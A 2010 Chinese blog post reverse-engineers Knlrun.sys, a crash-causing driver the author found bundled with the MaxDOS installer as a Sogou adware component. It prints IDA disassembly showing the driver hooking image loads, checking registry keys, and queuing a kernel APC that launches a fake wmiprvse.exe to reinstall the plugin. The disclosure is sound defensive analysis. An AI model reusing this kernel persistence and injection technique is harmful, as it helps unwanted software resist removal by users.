|
|
Posted on 2010-08-22 21:50 Jerson Ju 阅读(145) 评论(0) 编辑 收藏
笔记本用了4年,终于光荣退休。今天早上使用新笔记本,开机蓝屏了。系统目录文件拿出minidump文件,windbg分析发现是一个叫Knlrun.sys的驱动导致。 百度Knlrun,发现是搜狗一流氓插件的驱动文件,绑定在maxdos中。之前老机器我一直使用maxdos5.x版本,非常好用,新机器装的是maxdos 7.1结果中标了。 可恨可恨。流氓插件就算了,你不能蓝屏啊。还有maxdos软件你做共享软件,我们免费使用你的,我们很感激。但你总要在安装界面中给我们一个选择的选项,用户可以选择性的安装或取消,你说是不? 进入正题,开始分析它的驱动文件:   代码INIT:00011885 DriverEntry proc near ;驱动入口函数
INIT:00011885
INIT:00011885 DriverObject = dword ptr 8
INIT:00011885 RegistryPath = dword ptr 0Ch
INIT:00011885
INIT:00011885 mov edi, edi
INIT:00011887 push ebp
INIT:00011888 mov ebp, esp
INIT:0001188A mov eax, dword_11324
INIT:0001188F test eax, eax
INIT:00011891 mov ecx, 0BB40h
INIT:00011896 jz short loc_1189C
INIT:00011898 cmp eax, ecx
INIT:0001189A jnz short loc_118BF
INIT:0001189C
INIT:0001189C loc_1189C: ; CODE XREF: DriverEntry+11�j
INIT:0001189C mov edx, ds:KeTickCount
INIT:000118A2 mov eax, offset dword_11324
INIT:000118A7 shr eax, 8
INIT:000118AA xor eax, [edx]
INIT:000118AC and eax, 0FFFFh
INIT:000118B1 mov dword_11324, eax
INIT:000118B6 jnz short loc_118BF
INIT:000118B8 mov eax, ecx
INIT:000118BA mov dword_11324, eax
INIT:000118BF
INIT:000118BF loc_118BF: ; CODE XREF: DriverEntry+15�j
INIT:000118BF ; DriverEntry+31�j
INIT:000118BF not eax
INIT:000118C1 mov dword_11320, eax
INIT:000118C6 pop ebp
INIT:000118C7 jmp RealDriverEntry ;前面是时间计数,忽略。这就是真的入口函数,进去看看。
INIT:000118C7 DriverEntry endp
RealDriverEntry函数 代码.text:00010AD4 ; int __stdcall RealDriverEntry(PDRIVER_OBJECT DriverObject, int)
.text:00010AD4 RealDriverEntry proc near ; CODE XREF: DriverEntry+42�j
.text:00010AD4
.text:00010AD4 SymbolicLinkName= UNICODE_STRING ptr -18h
.text:00010AD4 DestinationString= UNICODE_STRING ptr -10h
.text:00010AD4 Handle = dword ptr -8
.text:00010AD4 DeviceObject = dword ptr -4
.text:00010AD4 DriverObject = dword ptr 8
.text:00010AD4
.text:00010AD4 mov edi, edi
.text:00010AD6 push ebp
.text:00010AD7 mov ebp, esp
.text:00010AD9 sub esp, 18h
.text:00010ADC push ebx
.text:00010ADD push esi
.text:00010ADE push edi
.text:00010ADF xor esi, esi
.text:00010AE1 push offset UnicodeString
.text:00010AE6 mov [ebp+DeviceObject], esi
.text:00010AE9 call sub_105DC
.text:00010AEE mov edi, ds:RtlInitUnicodeString
.text:00010AF4 push offset aDeviceKnlrun ; "\\Device\\KnlRun"
.text:00010AF9 lea eax, [ebp+DestinationString]
.text:00010AFC push eax ; DestinationString
.text:00010AFD call edi ; RtlInitUnicodeString
.text:00010AFF mov ebx, [ebp+DriverObject]
.text:00010B02 lea eax, [ebp+DeviceObject]
.text:00010B05 push eax ; DeviceObject
.text:00010B06 push esi ; Exclusive
.text:00010B07 push 100h ; DeviceCharacteristics
.text:00010B0C push 22h ; DeviceType
.text:00010B0E lea eax, [ebp+DestinationString]
.text:00010B11 push eax ; DeviceName
.text:00010B12 push esi ; DeviceExtensionSize
.text:00010B13 push ebx ; DriverObject
.text:00010B14 call ds:IoCreateDevice
.text:00010B1A push offset aDosdevicesKnlr ; "\\DosDevices\\KnlRun"
.text:00010B1F lea eax, [ebp+SymbolicLinkName]
.text:00010B22 push eax ; DestinationString
.text:00010B23 call edi ; RtlInitUnicodeString
.text:00010B25 lea eax, [ebp+DestinationString]
.text:00010B28 push eax ; DeviceName
.text:00010B29 lea eax, [ebp+SymbolicLinkName]
.text:00010B2C push eax ; SymbolicLinkName
.text:00010B2D call ds:IoCreateSymbolicLink
.text:00010B33 push 1Ch
.text:00010B35 pop ecx
.text:00010B36 mov eax, offset sub_10A6E
.text:00010B3B lea edi, [ebx+38h]
.text:00010B3E rep stosd
.text:00010B40 mov eax, [ebp+DeviceObject]
.text:00010B43 mov dword ptr [ebx+34h], offset unload_driver
.text:00010B4A or dword ptr [eax+1Ch], 4
.text:00010B4E push offset NotifyRoutine ; NotifyRoutine
.text:00010B53 call PsSetLoadImageNotifyRoutine
.text:00010B58 push esi ; State
.text:00010B59 push 1 ; Type
.text:00010B5B push offset Event ; Event
.text:00010B60 call ds:KeInitializeEvent
.text:00010B66 push esi ; StartContext
.text:00010B67 push offset StartRoutine ; StartRoutine
.text:00010B6C push esi ; ClientId
.text:00010B6D push esi ; ProcessHandle
.text:00010B6E push esi ; ObjectAttributes
.text:00010B6F mov edi, 1F03FFh
.text:00010B74 push edi ; DesiredAccess
.text:00010B75 lea eax, [ebp+Handle]
.text:00010B78 push eax ; ThreadHandle
.text:00010B79 call ds:PsCreateSystemThread
.text:00010B7F test eax, eax
.text:00010B81 jnz short loc_10B9E
.text:00010B83 push esi ; HandleInformation
.text:00010B84 push offset Object ; Object
.text:00010B89 push esi ; AccessMode
.text:00010B8A push esi ; ObjectType
.text:00010B8B push edi ; DesiredAccess
.text:00010B8C push [ebp+Handle] ; Handle
.text:00010B8F call ds:ObReferenceObjectByHandle
.text:00010B95 push [ebp+Handle] ; Handle
.text:00010B98 call ds:ZwClose
.text:00010B9E
.text:00010B9E loc_10B9E: ; CODE XREF: RealDriverEntry+AD�j
.text:00010B9E pop edi
.text:00010B9F pop esi
.text:00010BA0 xor eax, eax
.text:00010BA2 pop ebx
.text:00010BA3 leave
.text:00010BA4 retn 8
.text:00010BA4 RealDriverEntry endp
关键两个函数需要看,其他没什么东西。 PsSetLoadImageNotifyRoutine 系统载入模块时候都回回调这里设置的回调函数 PsCreateSystemThread 创建内核线程 做坏事都是在这里面。 先看PsSetLoadImageNotifyRoutine的回调函数 NotifyRoutine 代码.text:000108E4 ; void __stdcall NotifyRoutine(int FullName, int hHandle, int ImageInfo)
.text:000108E4 NotifyRoutine proc near ; DATA XREF: unload_driver+7�o
.text:000108E4 ; RealDriverEntry+7A�o
.text:000108E4
.text:000108E4 ImageInfo = dword ptr 10h
.text:000108E4
.text:000108E4 mov edi, edi
.text:000108E6 push ebp
.text:000108E7 mov ebp, esp
.text:000108E9 cmp dwCreateProcessA, 0
.text:000108F0 jnz short loc_1090B
.text:000108F2 mov eax, [ebp+ImageInfo]
.text:000108F5 push offset aCreateprocessa ; "CreateProcessA"
.text:000108FA push dword ptr [eax+4] ; ImageBase
.text:000108FD call IatHook
.text:00010902 test eax, eax
.text:00010904 jz short loc_1090B
.text:00010906 mov dwCreateProcessA, eax
.text:0001090B
.text:0001090B loc_1090B: ; CODE XREF: NotifyRoutine+C�j
.text:0001090B ; NotifyRoutine+20�j
.text:0001090B pop ebp
.text:0001090C retn 0Ch
.text:0001090C NotifyRoutine endp
这个例程主要工作就是枚举模块的导出表,获取CreateProcessA系统API地址。
继续往下看。 PsCreateSystemThread创建的内核线程函数
代码.text:00010922 ; void __stdcall StartRoutine(PVOID)
.text:00010922 StartRoutine proc near ; DATA XREF: RealDriverEntry+93�o
.text:00010922
.text:00010922 Timeout = LARGE_INTEGER ptr -8
.text:00010922
.text:00010922 mov edi, edi
.text:00010924 push ebp
.text:00010925 mov ebp, esp
.text:00010927 push ecx
.text:00010928 push ecx
.text:00010929 push esi
.text:0001092A push edi
.text:0001092B xor esi, esi
.text:0001092D xor eax, eax
.text:0001092F lea edi, [ebp+Timeout.HighPart]
.text:00010932 mov [ebp+Timeout.LowPart], esi
.text:00010935 stosd
.text:00010936
.text:00010936 loc_10936: ; CODE XREF: StartRoutine+74�j
.text:00010936 cmp dwCreateProcessA, esi
.text:0001093C jz short loc_10974
.text:0001093E cmp UnicodeString.Buffer, esi
.text:00010944 jnz short loc_10958
.text:00010946 push offset UnicodeString
.text:0001094B call GetCurrentUserSID
.text:00010950 cmp UnicodeString.Buffer, esi
.text:00010956 jz short loc_10974
.text:00010958
.text:00010958 loc_10958: ; CODE XREF: StartRoutine+22�j
.text:00010958 call ExistsHboRegKey
.text:0001095D test al, al
.text:0001095F jz short loc_1096A
.text:00010961 call sub_10666
.text:00010966 test al, al
.text:00010968 jz short loc_10974
.text:0001096A
.text:0001096A loc_1096A: ; CODE XREF: StartRoutine+3D�j
.text:0001096A push offset strwmiprvse
.text:0001096F call apcCreateWmiprvse_0
.text:00010974
.text:00010974 loc_10974: ; CODE XREF: StartRoutine+1A�j
.text:00010974 ; StartRoutine+34�j ...
.text:00010974 or [ebp+Timeout.HighPart], 0FFFFFFFFh
.text:00010978 lea eax, [ebp+Timeout]
.text:0001097B push eax ; Timeout
.text:0001097C push esi ; Alertable
.text:0001097D push esi ; WaitMode
.text:0001097E push esi ; WaitReason
.text:0001097F push offset Event ; Object
.text:00010984 mov [ebp+Timeout.LowPart], 0FE363C80h
.text:0001098B call ds:KeWaitForSingleObject
.text:00010991 cmp eax, 102h
.text:00010996 jz short loc_10936
.text:00010998 push esi ; ExitStatus
.text:00010999 call ds:PsTerminateSystemThread
.text:0001099F pop edi
.text:000109A0 pop esi
.text:000109A1 leave
.text:000109A2 retn 4
.text:000109A2 StartRoutine endp
里面有三个关键函数:
GetCurrentUserSID 为了得到 CurrentUser 的 SID(因为要操作\\registry\\user\\下的键) ExistsHboRegKey 打开流氓插件的注册表键,COM组建必须在注册表中有键值
apcCreateWmiprvse_0 内核模式启动应用层Wmiprvse.exe进程(这个不是微软的,是搜狗公司伪造的一个跟微软同名程序)
GetCurrentUserSID函数 代码.text:000105DC GetCurrentUserSID proc near ; CODE XREF: StartRoutine+29�p
.text:000105DC ; RealDriverEntry+15�p
.text:000105DC
.text:000105DC var_18 = byte ptr -18h
.text:000105DC arg_0 = dword ptr 8
.text:000105DC
.text:000105DC mov edi, edi
.text:000105DE push ebp
.text:000105DF mov ebp, esp
.text:000105E1 sub esp, 18h
.text:000105E4 call ds:IoGetCurrentProcess
.text:000105EA test eax, eax
.text:000105EC jz short locret_1065D
.text:000105EE push ebx
.text:000105EF lea ebx, [eax+88h]
.text:000105F5 cmp [ebx], ebx
.text:000105F7 jz short loc_1065C
.text:000105F9 push edi
.text:000105FA mov edi, [ebx]
.text:000105FC cmp edi, ebx
.text:000105FE jz short loc_1065B
.text:00010600 push esi
.text:00010601
.text:00010601 loc_10601: ; CODE XREF: GetCurrentUserSID+5D�j
.text:00010601 lea esi, [edi-88h]
.text:00010607 cmp dword ptr [esi+1A0h], 0
.text:0001060E jz short loc_10635
.text:00010610 lea eax, [esi+190h]
.text:00010616 cmp [eax], eax
.text:00010618 jz short loc_10635
.text:0001061A push 0Ch ; size_t
.text:0001061C lea eax, [esi+174h]
.text:00010622 push offset aExplorer_exe ; "explorer.exe"
.text:00010627 push eax ; char *
.text:00010628 call ds:_strnicmp
.text:0001062E add esp, 0Ch
.text:00010631 test eax, eax
.text:00010633 jz short loc_1063D
.text:00010635
.text:00010635 loc_10635: ; CODE XREF: GetCurrentUserSID+32�j
.text:00010635 ; GetCurrentUserSID+3C�j
.text:00010635 mov edi, [edi]
.text:00010637 cmp edi, ebx
.text:00010639 jnz short loc_10601
.text:0001063B jmp short loc_1065A
.text:0001063D ; ---------------------------------------------------------------------------
.text:0001063D
.text:0001063D loc_1063D: ; CODE XREF: GetCurrentUserSID+57�j
.text:0001063D lea eax, [ebp+var_18]
.text:00010640 push eax
.text:00010641 push esi
.text:00010642 call ds:KeStackAttachProcess
.text:00010648 push [ebp+arg_0]
.text:0001064B call sub_10486
.text:00010650 lea eax, [ebp+var_18]
.text:00010653 push eax
.text:00010654 call ds:KeUnstackDetachProcess
.text:0001065A
.text:0001065A loc_1065A: ; CODE XREF: GetCurrentUserSID+5F�j
.text:0001065A pop esi
.text:0001065B
.text:0001065B loc_1065B: ; CODE XREF: GetCurrentUserSID+22�j
.text:0001065B pop edi
.text:0001065C
.text:0001065C loc_1065C: ; CODE XREF: GetCurrentUserSID+1B�j
.text:0001065C pop ebx
.text:0001065D
.text:0001065D locret_1065D: ; CODE XREF: GetCurrentUserSID+10�j
.text:0001065D leave
.text:0001065E retn 4
.text:0001065E GetCurrentUserSID endp
ExistsHboRegKey代码 代码.text:000106FC ExistsHboRegKey proc near ; CODE XREF: StartRoutine:loc_10958�p
.text:000106FC
.text:000106FC ObjectAttributes= OBJECT_ATTRIBUTES ptr -430h
.text:000106FC DestinationString= UNICODE_STRING ptr -418h
.text:000106FC var_410 = dword ptr -410h
.text:000106FC Handle = dword ptr -40Ch
.text:000106FC var_408 = dword ptr -408h
.text:000106FC SourceString = word ptr -404h
.text:000106FC var_3E6 = byte ptr -3E6h
.text:000106FC var_4 = dword ptr -4
.text:000106FC
.text:000106FC mov edi, edi
.text:000106FE push ebp
.text:000106FF mov ebp, esp
.text:00010701 sub esp, 430h
.text:00010707 mov eax, dword_11324
.text:0001070C push ebx
.text:0001070D mov ebx, ds:wcslen
.text:00010713 mov [ebp+var_4], eax
.text:00010716 mov eax, offset off_11310
.text:0001071B push esi
.text:0001071C push edi
.text:0001071D mov [ebp+var_408], eax
.text:00010723 mov [ebp+var_410], eax
.text:00010729
.text:00010729 loc_10729: ; CODE XREF: ExistsHboRegKey+13F�j
.text:00010729 xor eax, eax
.text:0001072B mov ecx, 100h
.text:00010730 lea edi, [ebp+SourceString]
.text:00010736 rep stosd
.text:00010738 lea eax, [ebp+SourceString]
.text:0001073E push eax ; SourceString
.text:0001073F lea eax, [ebp+DestinationString]
.text:00010745 push eax ; DestinationString
.text:00010746 call ds:RtlInitUnicodeString
.text:0001074C push 7
.text:0001074E pop ecx
.text:0001074F mov esi, offset word_106D6
.text:00010754 lea edi, [ebp+SourceString]
.text:0001075A rep movsd
.text:0001075C movzx ecx, UnicodeString.Length
.text:00010763 mov eax, ecx
.text:00010765 movsw
.text:00010767 mov esi, UnicodeString.Buffer
.text:0001076D shr ecx, 2
.text:00010770 lea edi, [ebp+var_3E6]
.text:00010776 rep movsd
.text:00010778 mov ecx, eax
.text:0001077A mov eax, [ebp+var_408]
.text:00010780 and ecx, 3
.text:00010783 rep movsb
.text:00010785 mov esi, [eax]
.text:00010787 push esi ; wchar_t *
.text:00010788 mov [ebp+var_408], esi
.text:0001078E call ebx ; wcslen
.text:00010790 movzx edi, UnicodeString.Length
.text:00010797 push [ebp+var_408] ; wchar_t *
.text:0001079D mov ecx, eax
.text:0001079F shl ecx, 1
.text:000107A1 mov eax, ecx
.text:000107A3 shr ecx, 2
.text:000107A6 lea edi, [ebp+edi+var_3E6]
.text:000107AD rep movsd
.text:000107AF mov ecx, eax
.text:000107B1 and ecx, 3
.text:000107B4 rep movsb
.text:000107B6 call ebx ; wcslen
.text:000107B8 mov esi, ds:ZwOpenKey
.text:000107BE pop ecx
.text:000107BF pop ecx
.text:000107C0 mov ecx, dword ptr UnicodeString.Length
.text:000107C6 lea eax, [ecx+eax*2+1Eh]
.text:000107CA mov [ebp+DestinationString.Length], ax
.text:000107D1 xor eax, eax
.text:000107D3 mov [ebp+ObjectAttributes.RootDirectory], eax
.text:000107D9 mov [ebp+ObjectAttributes.SecurityDescriptor], eax
.text:000107DF mov [ebp+ObjectAttributes.SecurityQualityOfService], eax
.text:000107E5 lea eax, [ebp+ObjectAttributes]
.text:000107EB push eax ; ObjectAttributes
.text:000107EC mov edi, 20019h
.text:000107F1 push edi ; DesiredAccess
.text:000107F2 lea eax, [ebp+Handle]
.text:000107F8 lea ecx, [ebp+DestinationString]
.text:000107FE push eax ; KeyHandle
.text:000107FF mov [ebp+ObjectAttributes.Length], 18h
.text:00010809 mov [ebp+ObjectAttributes.Attributes], 40h
.text:00010813 mov [ebp+ObjectAttributes.ObjectName], ecx
.text:00010819 call esi ; ZwOpenKey
.text:0001081B test eax, eax
.text:0001081D jz loc_108B9
.text:00010823 mov eax, [ebp+var_410]
.text:00010829 add eax, 4
.text:0001082C cmp dword ptr [eax], 0
.text:0001082F mov [ebp+var_410], eax
.text:00010835 mov [ebp+var_408], eax
.text:0001083B jnz loc_10729
.text:00010841 mov eax, offset off_11318
.text:00010846 mov ebx, eax
.text:00010848
.text:00010848 loc_10848: ; CODE XREF: ExistsHboRegKey+1AC�j
.text:00010848 push dword ptr [eax] ; SourceString
.text:0001084A lea eax, [ebp+DestinationString]
.text:00010850 push eax ; DestinationString
.text:00010851 call ds:RtlInitUnicodeString
.text:00010857 xor eax, eax
.text:00010859 mov [ebp+ObjectAttributes.RootDirectory], eax
.text:0001085F mov [ebp+ObjectAttributes.SecurityDescriptor], eax
.text:00010865 mov [ebp+ObjectAttributes.SecurityQualityOfService], eax
.text:0001086B lea eax, [ebp+ObjectAttributes]
.text:00010871 push eax ; ObjectAttributes
.text:00010872 push edi ; DesiredAccess
.text:00010873 lea eax, [ebp+Handle]
.text:00010879 lea ecx, [ebp+DestinationString]
.text:0001087F push eax ; KeyHandle
.text:00010880 mov [ebp+ObjectAttributes.Length], 18h
.text:0001088A mov [ebp+ObjectAttributes.Attributes], 40h
.text:00010894 mov [ebp+ObjectAttributes.ObjectName], ecx
.text:0001089A call esi ; ZwOpenKey
.text:0001089C test eax, eax
.text:0001089E jz short loc_108BD
.text:000108A0 add ebx, 4
.text:000108A3 cmp dword ptr [ebx], 0
.text:000108A6 mov eax, ebx
.text:000108A8 jnz short loc_10848
.text:000108AA xor al, al
.text:000108AC
.text:000108AC loc_108AC: ; CODE XREF: ExistsHboRegKey+1D1�j
.text:000108AC mov ecx, [ebp+var_4]
.text:000108AF pop edi
.text:000108B0 pop esi
.text:000108B1 pop ebx
.text:000108B2 call sub_10CE9
.text:000108B7 leave
.text:000108B8 retn
apcCreateWmiprvse 创建用户态进程 代码PAGE:000115FE apcCreateWmiprvse proc near ; CODE XREF: apcCreateWmiprvse_0+B0�p
PAGE:000115FE
PAGE:000115FE var_34 = byte ptr -34h
PAGE:000115FE P = dword ptr -1Ch
PAGE:000115FE ms_exc = CPPEH_RECORD ptr -18h
PAGE:000115FE arg_0 = dword ptr 8
PAGE:000115FE arg_4 = dword ptr 0Ch
PAGE:000115FE arg_8 = dword ptr 10h
PAGE:000115FE
PAGE:000115FE push 24h
PAGE:00011600 push offset stru_11210
PAGE:00011605 call __SEH_prolog
PAGE:0001160A xor esi, esi
PAGE:0001160C cmp [ebp+arg_4], esi
PAGE:0001160F jz loc_1179B
PAGE:00011615 cmp [ebp+arg_8], esi
PAGE:00011618 jz loc_1179B
PAGE:0001161E push 206B6444h ; Tag
PAGE:00011623 push 30h ; NumberOfBytes
PAGE:00011625 push esi ; PoolType
PAGE:00011626 call ds:ExAllocatePoolWithTag
PAGE:0001162C mov edi, eax
PAGE:0001162E mov [ebp+P], edi
PAGE:00011631 cmp edi, esi
PAGE:00011633 jz short loc_1165D
PAGE:00011635 mov eax, offset nullsub_1
PAGE:0001163A mov ecx, offset sub_113C8
PAGE:0001163F sub eax, ecx
PAGE:00011641 push esi ; Irp
PAGE:00011642 push esi ; ChargeQuota
PAGE:00011643 push esi ; SecondaryBuffer
PAGE:00011644 push eax ; Length
PAGE:00011645 push ecx ; VirtualAddress
PAGE:00011646 call ds:IoAllocateMdl
PAGE:0001164C mov MemoryDescriptorList, eax
PAGE:00011651 cmp eax, esi
PAGE:00011653 jnz short loc_11667
PAGE:00011655 push esi ; Tag
PAGE:00011656 push edi ; P
PAGE:00011657 call ds:ExFreePoolWithTag
PAGE:0001165D
PAGE:0001165D loc_1165D: ; CODE XREF: apcCreateWmiprvse+35�j
PAGE:0001165D mov eax, 0C000009Ah
PAGE:00011662 jmp loc_117A0
PAGE:00011667 ; ---------------------------------------------------------------------------
PAGE:00011667
PAGE:00011667 loc_11667: ; CODE XREF: apcCreateWmiprvse+55�j
PAGE:00011667 mov [ebp+ms_exc.disabled], esi
PAGE:0001166A push 1 ; Operation
PAGE:0001166C push esi ; AccessMode
PAGE:0001166D push eax ; MemoryDescriptorList
PAGE:0001166E call ds:MmProbeAndLockPages
PAGE:00011674 or [ebp+ms_exc.disabled], 0FFFFFFFFh
PAGE:00011678 lea eax, [ebp+var_34]
PAGE:0001167B push eax
PAGE:0001167C push [ebp+arg_8]
PAGE:0001167F call ds:KeStackAttachProcess
PAGE:00011685 push 10h ; Priority
PAGE:00011687 push esi ; BugCheckOnFailure
PAGE:00011688 push esi ; BaseAddress
PAGE:00011689 push 1 ; CacheType
PAGE:0001168B push 1 ; AccessMode
PAGE:0001168D push MemoryDescriptorList ; MemoryDescriptorList
PAGE:00011693 call ds:MmMapLockedPagesSpecifyCache
PAGE:00011699 mov ebx, eax
PAGE:0001169B cmp ebx, esi
PAGE:0001169D jnz short loc_116BC
PAGE:0001169F lea eax, [ebp+var_34]
PAGE:000116A2 push eax
PAGE:000116A3 call ds:KeUnstackDetachProcess
PAGE:000116A9 push MemoryDescriptorList ; Mdl
PAGE:000116AF call ds:IoFreeMdl
PAGE:000116B5 push esi
PAGE:000116B6 push edi
PAGE:000116B7 jmp loc_1176D
PAGE:000116BC ; ---------------------------------------------------------------------------
PAGE:000116BC
PAGE:000116BC loc_116BC: ; CODE XREF: apcCreateWmiprvse+9F�j
PAGE:000116BC lea edx, [ebx+29h]
PAGE:000116BF push 4Bh
PAGE:000116C1 pop ecx
PAGE:000116C2 xor eax, eax
PAGE:000116C4 mov edi, edx
PAGE:000116C6 rep stosd
PAGE:000116C8 mov esi, [ebp+arg_0]
PAGE:000116CB lea edi, [esi+1]
PAGE:000116CE
PAGE:000116CE loc_116CE: ; CODE XREF: apcCreateWmiprvse+D5�j
PAGE:000116CE mov al, [esi]
PAGE:000116D0 inc esi
PAGE:000116D1 test al, al
PAGE:000116D3 jnz short loc_116CE
PAGE:000116D5 sub esi, edi
PAGE:000116D7 mov ecx, esi
PAGE:000116D9 lea edi, [ebx+7Dh]
PAGE:000116DC mov esi, [ebp+arg_0] ;"wmiprvse.exe"
PAGE:000116DF mov eax, ecx
PAGE:000116E1 shr ecx, 2
PAGE:000116E4 rep movsd
PAGE:000116E6 mov ecx, eax
PAGE:000116E8 and ecx, 3 ;这里10行作用,在组织创建进程的机器码
PAGE:000116EB rep movsb
PAGE:000116ED mov eax, dwCreateProcessA
PAGE:000116F2 mov [ebx+1], eax
PAGE:000116F5 mov dword ptr [edx], 44h
PAGE:000116FB xor edi, edi
PAGE:000116FD inc edi
PAGE:000116FE mov [edx+2Ch], edi
PAGE:00011701 xor esi, esi
PAGE:00011703 mov [edx+30h], si
PAGE:00011707 mov [ebx+0Bh], edx
PAGE:0001170A lea eax, [ebx+6Dh]
PAGE:0001170D mov [ebx+6], eax
PAGE:00011710 lea eax, [ebx+7Dh]
PAGE:00011713 mov [ebx+1Ch], eax
PAGE:00011716 lea eax, [ebp+var_34]
PAGE:00011719 push eax
PAGE:0001171A call ds:KeUnstackDetachProcess
PAGE:00011720 mov eax, [ebp+arg_4]
PAGE:00011723 cmp byte ptr [eax+4Ah], 0
PAGE:00011727 jnz short loc_1172D
PAGE:00011729 mov byte ptr [eax+4Ah], 1
PAGE:0001172D
PAGE:0001172D loc_1172D: ; CODE XREF: apcCreateWmiprvse+129�j
PAGE:0001172D push esi
PAGE:0001172E push edi
PAGE:0001172F push ebx
PAGE:00011730 push esi
PAGE:00011731 push offset FreePoolMem
PAGE:00011736 push esi
PAGE:00011737 push eax
PAGE:00011738 push [ebp+P]
PAGE:0001173B call ds:KeInitializeApc
PAGE:00011741 push esi
PAGE:00011742 push esi
PAGE:00011743 push esi
PAGE:00011744 push [ebp+P]
PAGE:00011747 call ds:KeInsertQueueApc
PAGE:0001174D test al, al
PAGE:0001174F jnz short loc_11775
PAGE:00011751 push MemoryDescriptorList ; MemoryDescriptorList
PAGE:00011757 call ds:MmUnlockPages
PAGE:0001175D push MemoryDescriptorList ; Mdl
PAGE:00011763 call ds:IoFreeMdl
PAGE:00011769 push esi ; Tag
PAGE:0001176A push [ebp+P] ; P
PAGE:0001176D
PAGE:0001176D loc_1176D: ; CODE XREF: apcCreateWmiprvse+B9�j
PAGE:0001176D call ds:ExFreePoolWithTag
PAGE:00011773 jmp short loc_1179B
PAGE:00011775 ; ---------------------------------------------------------------------------
PAGE:00011775
PAGE:00011775 loc_11775: ; CODE XREF: apcCreateWmiprvse+151�j
PAGE:00011775 xor eax, eax
PAGE:00011777 jmp short loc_117A0
PAGE:00011779 ; ---------------------------------------------------------------------------
PAGE:00011779
PAGE:00011779 loc_11779: ; DATA XREF: .rdata:stru_11210�o
PAGE:00011779 xor eax, eax
PAGE:0001177B inc eax
PAGE:0001177C retn
PAGE:0001177D ; ---------------------------------------------------------------------------
PAGE:0001177D
PAGE:0001177D loc_1177D: ; DATA XREF: .rdata:stru_11210�o
PAGE:0001177D mov esp, [ebp+ms_exc.old_esp]
PAGE:00011780 push MemoryDescriptorList ; Mdl
PAGE:00011786 call ds:IoFreeMdl
PAGE:0001178C push 0 ; Tag
PAGE:0001178E push [ebp+P] ; P
PAGE:00011791 call ds:ExFreePoolWithTag
PAGE:00011797 or [ebp+ms_exc.disabled], 0FFFFFFFFh
PAGE:0001179B
PAGE:0001179B loc_1179B: ; CODE XREF: apcCreateWmiprvse+11�j
PAGE:0001179B ; apcCreateWmiprvse+1A�j ...
PAGE:0001179B mov eax, 0C0000001h
PAGE:000117A0
PAGE:000117A0 loc_117A0: ; CODE XREF: apcCreateWmiprvse+64�j
PAGE:000117A0 ; apcCreateWmiprvse+179�j
PAGE:000117A0 call __SEH_epilog
PAGE:000117A5 retn 0Ch
PAGE:000117A5 apcCreateWmiprvse endp
总结: 这个驱动程序作用是保护流氓插件,防止我们删除插件。一旦发现我们删除插件,驱动在内核态启动用户态 Wmiprvse.exe(伪造程序,跟微软某服务同名)继续安装流氓插件。
ps:本人能力有限,如分析有所偏差,请高手指点,不要丢砖头啊。
作者:朱剑 (zhujian198)
目前就职美国comodo有限公司中国研发中心
|